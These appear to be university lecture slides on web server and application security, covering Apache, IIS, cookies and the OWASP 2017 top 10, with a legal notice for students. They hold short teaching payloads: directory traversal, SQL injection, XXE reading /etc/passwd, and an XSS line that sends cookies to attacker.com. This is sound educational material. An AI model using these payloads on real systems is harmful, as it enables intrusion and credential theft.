

Web servers, applications, and vulnerabilities



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Web application

- Runs on a remote server
- Accessed through a client
- Popular because they provide flexibility and power
- Apps can offer their unique services to a specific platform, or they can be platform independent
- Support for mobile computing
- How to attack and compromise them



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Who interacts with a web server

- Server Administrators
- Network Administrators
- End Users
- Application Administrator
- Application Developer



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Web Servers

- Software package that is designed to deliver files and content over HTTP
- Response to requests that come from clients in software form
- Differentiated by
 - Operating system support, server-side technologies, security models, client support, development tools, and many more factors
- Examples:
 - Internet information server (IIS)
 - Apache



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Apache Web Server

- The most popular technology of its type in the world
- Estimated 60 percent of web servers on the internet running the software
- Supports a large number of features (open source)
- Modules include the following:
 - Authentication, SSL support, TLS support, proxy support, URL rewriter, HTTP request filtering, python and perl support, PHP, compression support, intrusion detection, enhanced logging



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Internet Information Server (IIS)

- Microsoft's web server
- Modules that can be added to IIS include these:
 - Process management, Server-side language, Support for legacy technologies (mainly for IIS 6.0 users), Protocol listeners, Security support, Certificate support, Authentication support, Database support
- Protocol listeners
- HTTP listener - part of the HTTP.sys module



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Web Applications

- Software that is installed on top of a web server
 - Designed to respond to requests, process information, store information, and scale in response to demand
- Three variations:
 - Browser based
 - Client based
 - Mobile apps



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Client - Server

- Server application
 - Hosted on a web server
 - Accessed remotely via
 - A web browser or
 - A web-enabled application
- Client application
 - Performs minimal processing of information
 - Optimized to present the information to the user
- Information
 - stored on the server,
 - some small portions residing on the client
 - such as metadata



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Platforms and technologies

- Some web applications are locked to a specific platform
 - Mobile OS dependent
 - Different versions of the client for different platforms
- Server-side technologies
 - Active server pages (ASP), ASP.NET, PHP, etc.
- Client-side technologies
 - Dynamic HTML (DHTML), HTML 5, javascript



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Web application details

- Consists of layers:
 - Presentation Layer
 - Logic Layer
 - Data Layer
- HTTPS
 - HTTP employing encryption mechanisms
- Use of an underlying web server technology
 - IIS, apache, etc
- Cookie
 - A file stored on a client system that is used as a token by applications



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Cookies

- Necessary for the functioning
 - Applications that rely on the ability to maintain state information across stateless protocols such as HTTP
- A potential liability
 - A commonly exercised attack method for malicious users who employ them
- Primary purpose - maintaining state information
 - Example online store



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Web Servers and Applications Vulnerabilities

- Many of the vulnerabilities similar to other environments
- Some vulnerabilities unique to this environment
- Some of the vulnerabilities:
 - Flawed web design
 - Buffer overflow
 - Error messages
 - ...



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Flawed Web Design

- ```
<form method="post" action="../../../cgi-bin/formMail.pl">
<!--Regular FormMail options-->
<input type=hidden name="recipient" value=someone@some.com>
...
<input type=hidden name="servername" value=https://payments.some.com>
...
<input type=hidden name="orderconfirmation" value="orders@some.com">
```
- ```
<FORM ACTION =http://1.1.1.1/cgi-bin/order.pl" method="post">
<input type=hidden name="price" value="500.00">
<input type=hidden name="prod_id" value="12345">
QUANTITY: <input type=text name="quant" size=2 maxlength=2 value=1>
```



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Buffer Overflow

- Occurs when an application, process, or program attempts to put more data in a buffer than it was designed to hold
- A programmer creates a buffer in code but does not put restrictions on it
- Data overflows into the buffers it was not intended for
- The result can be corrupted or overwritten data



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Error Messages

- can reveal a lot of information about a server and a web application
- can be configured or suppressed as necessary



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Common Attack Methods

- Some of the common attack methods:
 - Insecure Logon Systems
 - Scripting Errors
 - Session Management Issues
 - Encryption Weaknesses
 - Directory Traversal Attacks
 - ...



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Insecure Logon Systems

- Web applications require some sort of authentication or login process
- It is essential that it be handled safely and securely
- The incorrect or improper entry of information does not reveal data



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Scripting Errors

- Methods to exploit scripting languages:
 - Upload bombing
 - Default scripts
 - Poorly written scripts
 - ...



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Session Management Issues

- The connection that a client has with the server application
- Some vulnerabilities of this type include the following:
 - Long-lived sessions
 - Logout features
 - Insecure or weak session identifiers
 - Poor or no password change controls
 - Inclusion of unprotected information in cookies



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Protecting Cookies

- List of the attributes that can be set on a per-cookie basis, which makes them safer to use:
 - Secure
 - Httponly
 - Expires
 - ...



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Encryption Weaknesses

- When considering encryption and its impact on the application, focus on these areas of concern:
 - Weak Ciphers
 - Vulnerable Software



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Directory Traversal Attacks

- Example of a GET HTTP request URL:

- `http://somesite.com/show.asp?view=history.html`

- Attacker can craft a custom URL:

`http://somesite.com/show.asp?view=../../../../../../../../Windows/system.ini`

- Directory traversal attack countermeasures:
 - Running modern web server software
 - Enabling filtering of user input to the web server



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Testing Web Applications

- Burp Suite
 - Proxy
 - Spider
 - Scanner
 - Intruder
 - Repeater
 - Sequencer



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Software development caused vulnerabilities

- How to include security in software development lifecycle
- How to detect vulnerabilities in production environment software products
- Some significant attempts in software vulnerabilities classification made by:
 - *SANS (Sysadmin, Audit, Network, Security)* and
 - *OWASP (Open Web Application Security Project)*



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OWASP 2017. top 10

- Injection
 - String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
 - http://example.com/app/accountView?id=' or '1'='1
- Broken Authentication
- Sensitive Data Exposure
- XML External Entities (XXE)
 - <?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>



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OWASP 2017. top 10 (2)

- Broken Access Control
 - `http://example.com/app/getappInfo`
`http://example.com/app/admin_getappInfo`
- Security Misconfiguration
- Cross-Site Scripting (XSS)
 - `(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";`
 - `'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'`



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OWASP 2017. top 10 (3)

- Insecure Deserialization
 - `a:4:{i:0;i:132;i:1;s:7:"Peter";i:2;s:4:"user";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}`
 - `a:4:{i:0;i:1;i:1;s:5:"Tom";i:2;s:5:"admin";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}`
- Using Components with Known Vulnerabilities
- Insufficient Logging & Monitoring



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NOTICE FOR STUDENTS

- Topics of the Advanced Network and System Security course involve the study of various mechanisms that violate information security and make intrusions into computer systems and networks.
- The application of these mechanisms when executed towards the systems of individuals and legal entities, which are not familiar with them and are not consentient with the activities on checking vulnerability and testing intrusions into their systems, is punishable under the Criminal Law of the Republic of Serbia (Articles 298 to 304a).
- Students enrolled at the Advanced Network and System Security course may use these methods for study purposes only within the closed laboratory environment provided for teaching the Advanced Network and System Security course.
- Students may not imply that they are in any way encouraged by the teachers or that they are recommended to use these methods toward other systems of the School of Electrical Engineering or the systems of any third party entity or individual.
- Any eventual activity that a student would undertake using these methods and mechanisms according to systems that are not within the laboratory on the course is the sole responsibility of the student.



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